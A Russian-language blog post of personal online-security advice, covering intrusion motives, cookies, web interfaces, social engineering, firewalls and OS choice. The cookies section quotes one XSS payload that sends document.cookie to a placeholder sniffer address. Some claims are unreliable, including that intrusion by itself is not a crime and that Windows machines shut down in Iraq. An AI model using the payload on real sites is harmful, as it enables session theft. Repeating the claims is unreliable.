Безопасность в сети

Сегодня я хочу поговорить о том, как обезопасить своё пребывание во всемирной паутине. Многие скажут: «Да зачем это нужно?! Информационная безопасность нужна только для банков и больших корпораций. У меня и защищать то нечего..» . Это, конечно же, не правильно. Личная переписка и личные данные это не то, что должно становиться достоянием общественности. Заранее предупреждаю, мой подход к данной проблеме немного необычный, и некоторые могут со мной не соглашаться, но важно только то, что это работает...

Итак, для начала давайте разберёмся в причинах предполагаемого взлома. 
Их не так и много:
• Любопытство — да, да многие взломы осуществляются из чистого любопытства. Например, знаменитый червь Морисса не имел никакой полезной (читай вредоносной) начинки. Взлом ради взлома. Желание познавать неизведанное, это основа философии настоящих хакеров.
• Желание навредить — зависть, месть, вражда, всё это способно толкнуть человека на неправомерный поступок. Кстати сказать, важно понимать тонкости уголовного кодекса: сам по себе взлом не является преступлением, преступлением является неправомерное изменение, или использование чужой информации. Так делают вандалы. 
• Корыстный умысел — ну, это уже оплот профессиональных кибер преступников, хакерами их ну язык не поворачивается назвать. Здесь есть масса вариантов применения полученной информации: шантаж, мошенничество, кража данных, реквизитов е-карт..
Иногда зная причину можно выйти на след взломщика, или оценить предполагаемые последствия. Скажем незнакомый человек взломав почтовый ящик не будет удалять вашу почту. А если после взлома вам указали на недостатки вашей защиты, то вреда от такого взлома не будет, это безусловно был настоящий хакер, и действовал он исключительно из спортивного любопытства.

Теперь стоит обратить внимание на потенциально опасные уязвимости в стандартной системе.
• Cookies куки, и ещё раз куки!!! Самое бестолковое изобретение всех времён и народов, и самое уязвимое место в любой обороне. Documents cookies — это такие файлы, в которых веб сайт может сохранять необходимую для него информацию: например настройки интерфейса и данные для авторизации(!) Беда в том, что взломщик может с лёгкостью заполучить из куки: ваш логин и пароль, Посредством сетевого сниффера и соответствующей строки запроса, ну например такой:
<script>document.location="http://путь к снифу?"+document.cookie</script>
Я не буду останавливаться на тонкостях взлома, на эту тему и без меня написано тысячи статей. Нам сейчас важно обезопасить свою информацию. Вот что для этого нужно:
1. Поставить программу для хранения паролей (например Last Pass для FireFOX, а ещё надёжней написать свою)
2. Записать все важные пароли
3. Очистить cookies
4. Удалить все cookies
5. Убрать галочку с поля «принимать cookie с сайтов» в меню: 
Правка → Настройки → Приватность, браузера Mozilla FireFOX (если вы используете другой браузер, настоятельно рекомендую пересесть на FireFOX, для него существует масса необходимых для защиты плагинов, что позволяет повысить защищённость системы)
Ну всё, если вы всё сделали правильно атаки посредством Documents Cookies вам больше не угрожают. Закрывая тему Cookies хочу добавить:
1. Изредка встречаются сайты, для которых использование cookies необходимо. Если вам попался такой сайт, то создайте для него индивидуальное правило безопасности. (т.е. включите куки только для него)
2. Существует распространённое мнение, что наиболее надёжно вообще не хранить пароли на компьютере, а каждый раз вводить их с клавиатуры. Это в корне неверно. Во-первых, это неудобно, во-вторых, существуют такие хакерские приблуды как кейлогеры, которые запоминают нажатия клавиш, таким образом вводя пароль вы рискуете сообщить его хакеру.
• Web Interface – на втором месте я собрал воедино все атаки с выполнением хакерского кода в браузере жертвы сюда вошли некоторые разновидности XCC (в сочетании с социальной инженерией) и ошибки WMF и ошибки переполнения. Сейчас для нас не важно, как реализовывать данные атаки, а важно то, что все они требуют присутствие браузера. Отсюда вывод, с потенциально важной информацией нельзя работать посредством веб интерфейса. Т.е. Для чтения почты пользуемся почтовой программой(Evolution, The Bad), файлы для своего сайта загружаем посредством FTP клиента, в блоге пишем посредством программ для работы с RSS. (этим занимается даже обычный офис). К сожалению иногда использование веб интерфейса необходимо, в таких случаях отключаем не используемые на данном ресурсе функции (например великое счастье отключить Flash на mail.ru, и рекламы не будет, и FlashXCC уже не кто не проведёт(я имею ввиду соц. инженерию с эмуляцией интерфейса, об этом позднее)) А чтобы не заморачиваться со всеми тонкостями настройки, в FireFOX существует хороший плагин для контроля над скриптами — Adblock Plus, причём для хорошей безопасности, я бы порекомендовал, для потенциально важных ресурсов включать в нём не чёрный список а белый(только в свежих версиях!) т.е. запускать только нужные для работы сайта скриптов, тогда любой хакерский скрипт уже точно не запустится.
• Социальная инженерия — третья по порядку, но никак не по важности. Соц. инженерия - это одно из самых эффективных орудий хакера. И как всё гениальное она очень проста. Сейчас я перечислю несколько самых распространённых методов социальной инженерии:
1. Просьба, от имени администрации выслать пароль... Никогда и не кому не отправляйте паролей!
2. Вам подсовывают эмуляцию страницы авторизации. Если вы увидите страницу приглашающую ввести пароль в середине сеанса, нужно заново зайти на сайт через меню, возможно страница фальшивая. Или другой вариант, вас просят ввести пароль от ящика на совершенно другом сервере (пример www.berserk.ru Берсерк online) таким образом авторы сайта получают полный доступ.
3. Вам подсовывают открытку на почту, где вместо картинки ссылка на скрипт, если вы сделали всё вышеперечисленное, то это уже работать не будет.
4. Узнав много информации о вас злоумышленник может обратиться к службе поддержки, преставившись вами, и поменять пароль. 
• Firewall — ну кто вам сказал, что антивирус спасёт от всех бед?! Нет нет и ещё раз нет! Первым делом нужно ставить firewall (для windows Kaspersky AntiHacker, для Linux например kmyfirewall) Файрвол оградит от взлома операционной системы, и заблокирует трояны и бакдоры.
• Права доступа — для повседневной работы создайте учётную запись с минимальными правами (гость для Windows, в Linux разработчики уже всё предусмотрели и без вас) чем меньше прав тем меньше шансов подхватить вирус, и тем сложнее хакеру в вашей системе.
• Операционная система — если вы всерьёз обеспокоены безопасностью своей информации помните, что использование OS Windows потенциально опасно само по себе. Лучший вариант безопасной системы на мой взгляд это Debian GNU/Linux. Оптимальный — Ubuntu GNU/Linux (чем я собственно сам и пользуюсь). Переходите на опен сурс, это сильно укрепит вашу безопасность. Помните, во время военной операции в Ираке отключились все компьютеры под управлением Windows. И сколько ненависти должно быть в человеке, чтобы он начал рвать плюшевых пингвинят?! А работники Майкрософт это делают регулярно.
• То, что все знают, но о чём не следует забывать 
◦ Любой пароль должен быть надёжным. Предлагаю использовать фразы. Их легко запомнить, и сложно подобрать.
◦ Секретный вопрос должен быть не хуже пароля
◦ Следует вовремя обновлять систему. 
Ну, вот я и написал почти всё, что хотел. В заключение хочу добавить, что если после всех этих действий вас всё таки взломали, нужно непременно попытаться найти злоумышленника. Это делается посредством выявления IP. Если взломали почту, необходимо обратиться к администрации. И сообщить им свой IP (если статичный(постоянный)) или маску подсети (если IP динамичный) у провайдера в логах сохранены все сеансы. Он найдёт IP, не соответствующий вашей маске/IP, и сравнив его с другими логами выйдет на взломщика. На этом пока закончу. И помните, главное — это внутренняя гармония, тогда вас не зачем будет взламывать. Don't worry, be happy!


Коментарии

Всего комментариев: 0


Имя *:

Email:

Код *:

Copyright WhiteHakeR © 2008-2024